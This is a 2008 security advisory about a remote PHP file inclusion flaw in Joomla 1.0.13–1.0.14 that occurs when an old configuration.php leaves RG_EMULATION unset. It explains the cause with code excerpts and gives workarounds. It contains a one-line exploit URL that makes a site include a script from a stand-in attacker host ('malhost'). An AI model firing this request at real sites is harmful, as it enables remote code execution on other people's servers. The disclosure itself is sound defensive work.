Lucene search

K
securityvulnsSecurityvulnsSECURITYVULNS:DOC:19133
HistoryFeb 15, 2008 - 12:00 a.m.

Joomla 1.0.13 - 1.0.14 / (remote) PHP file inclusion possible if old configuration.php

2008-02-1500:00:00
vulners.com
30

Affects: Joomla 1.0.13 - 1.0.14
Vulnerability: (remote) PHP file inclusion possible if old
configuration.php
Date: 14-feb-2008

Introduction:

Remote PHP file inclusion is possible when RG_EMULATION is not defined
in
configuration.php. This is typical when upgrading from an older version,
leaving configuration.php untouched. Furthermore, in PHP,
register_globals
must be 'off', for this exploit to work.

In Joomla >=1.0.13, configuration.php-dist disables register_globals
emulation, by defining RG_EMULATION false. In older Joomla versions,
this
was defined in globals.php instead.

Users upgrading, without touching configuration.php (quite typical),
will have RG_EMULATION
unset, resulting in the following vulnerability.

In Revision 7424 of globals.php, the 'configuration.php' file is
included
before registerGlobals() is called, allowing a malicious peer to
override any value set in configuration.php.

Details:

Since revision 7424, globals.php includes 'configuration.php' if
RG_EMULATION is unset, and enables RG_EMULATION by default for 'old
configuration files':

if( defined( 'RG_EMULATION' ) === false ) {
if( file_exists( dirname(FILE).'/configuration.php' ) ) {
require( dirname(FILE).'/configuration.php' );
}

if( defined( 'RG_EMULATION' ) === false ) {
// The configuration file is old so default to on
define( 'RG_EMULATION', 1 );
}
}

The registerGlobals function is called after having included
'configuration.php':

} else if (ini_get('register_globals') == 0) {
// php.ini has register_globals = off and emulate = on
registerGlobals();

Maliciously set GET variables cause variables set by configuration.php
to be overwritten.

Looking in index.php:

require( 'globals.php' );
require_once( 'configuration.php' );

Since 'configuration.php' was already included by globals.php, the
require_once() won't include the configuration.php again (leaving
"attacker's" values untouched!).

The exploit:

http://joomlasite/index.php?mosConfig_absolute_path=http://malhost/php_s
cript.txt

Workaround:

In index*.php and administrator/index*.php change:

require_once( 'configuration.php' );

to

require('configuration.php');

Or disable RG_EMULATION by using the line in configuration.php-dist in
configuration.php:

if(!defined('RG_EMULATION')) { define( 'RG_EMULATION', 0 ); } // Off by
default for security

Regards,

Hendrik-Jan Verheij
BWSS B.V.